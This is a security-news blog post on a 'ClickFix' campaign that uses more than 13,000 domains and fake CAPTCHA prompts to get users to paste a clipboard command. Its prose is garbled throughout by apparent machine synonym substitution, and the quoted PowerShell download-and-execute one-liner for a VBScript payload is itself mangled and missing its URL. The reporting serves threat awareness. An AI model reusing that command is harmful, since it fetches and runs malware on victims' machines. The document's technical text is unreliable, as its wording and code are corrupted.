Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Registered 13,000+ Unique Domains and Leverages Cloudflare to Launch Clickfix Attacks

Posted on October 15, 2025October 15, 2025 By CWS

In mid-2025, Lab539 researchers noticed an surprising surge in a novel browser-based malware marketing campaign dubbed “ClickFix.”

Rising quietly in July, the menace rapidly expanded its attain by registering over 13,000 distinctive domains designed to lure customers into executing malicious instructions on their very own units.

The assault leverages compromised or low-cost internet hosting infrastructure, together with a good portion behind Cloudflare, to ship payloads through deceptively benign internet prompts.

Customers encountering these websites are first challenged with a CAPTCHA earlier than being instructed to run a command from their clipboard, granting attackers the flexibility to deploy arbitrary scripts or executables.

Initially, the quantity of ClickFix domains appeared unremarkable amid the huge sea of adversary exercise.

Nevertheless, by mid-August, a outstanding spike raised alarms throughout a number of threat-intelligence platforms.

Lab539 analysts famous the sudden proliferation of front-end websites that frontload malware supply below the guise of “verification” steps, an indicator that distinguishes ClickFix from extra conventional phishing or watering-hole assaults.

The dimensions of area registration recommended an automatic provisioning pipeline, doubtless fueled by pay-as-you-go registrar providers and resold internet hosting, relatively than the handbook setup favored by superior persistent menace actors.

Regardless of Cloudflare’s dominance amongst internet hosting suppliers, accounting for about 24% of noticed ClickFix domains, the marketing campaign’s lengthy tail of almost 500 different suppliers reveals a strategic use of numerous infrastructure to evade easy blocklists.

Regional VPS providers in the US, Germany, Indonesia, and Brazil characteristic prominently, reflecting each world distribution and opportunistic compromise of third-party servers.

In lots of circumstances, attackers repurpose stale or misconfigured subdomains—resembling decades-old educational or municipal hosts—to mix malicious site visitors with reliable DNS information.

ClickFix immediate encountered by victims (Supply – Lab539)

An infection Mechanism and Payload Supply

The core an infection mechanism depends on leveraging the browser’s clipboard API to plant a command that the person unwittingly pastes right into a terminal.

As soon as a CAPTCHA completes, the location writes a PowerShell command sequence like the next to the clipboard:-

cmd /c begin /min powershell -Command curl.exe -s -o $env:TEMPcaptcha.vbs; Begin-Course of $env:TEMPcaptcha.vbs

This single line downloads and executes a VBScript payload with out additional person interplay, exemplifying the marketing campaign’s emphasis on social engineering over exploit chaining.

Variations embody direct executable downloads and obfuscated scripts, indicating a number of operators using the ClickFix framework.

The ubiquity of this mechanism underscores how minimal technical sophistication can nonetheless yield large-scale intrusion alternatives when mixed with automated area registration and world internet hosting belongings.

Observe us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Attacks, ClickFix, Cloudflare, Domains, Hackers, Launch, Leverages, Registered, Unique

Post navigation

Previous Post: F5 Breached – Hackers Stole BIG-IP Source Code and Undisclosed Vulnerabilities Data
Next Post: F5 Breach Exposes BIG-IP Source Code — Nation-State Hackers Behind Massive Intrusion

Related Posts

Apache Airflow Vulnerability Exposes Sensitive Details to Read-Only Users Cyber Security News
First AI-Powered Malware LAMEHUG Attacking Organizations With Compromised Official Email Account Cyber Security News
Detecting and Remediating Misconfigurations in Cloud Environments Cyber Security News
Breaking Down Silos Aligning IT and Security Teams Cyber Security News
PyPI Released Advisory to Prevent ZIP Parser Confusion Attacks on Python Package Installers Cyber Security News
Nessus Windows Vulnerabilities Allow Overwrite of Arbitrary Local System Files Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • MuddyWater Using New Malware Toolkit to Deliver Phoenix Backdoor Malware to International Organizations
  • New Red Teaming Tool RedTiger Attacking Gamers And Discord Accounts In The Wild
  • Critical Windows Server WSUS Vulnerability Exploited in the Wild 
  • APT36 Targets Indian Government with Golang-Based DeskRAT Malware Campaign
  • Hackers Target Perplexity Comet Browser Users

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • MuddyWater Using New Malware Toolkit to Deliver Phoenix Backdoor Malware to International Organizations
  • New Red Teaming Tool RedTiger Attacking Gamers And Discord Accounts In The Wild
  • Critical Windows Server WSUS Vulnerability Exploited in the Wild 
  • APT36 Targets Indian Government with Golang-Based DeskRAT Malware Campaign
  • Hackers Target Perplexity Comet Browser Users

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News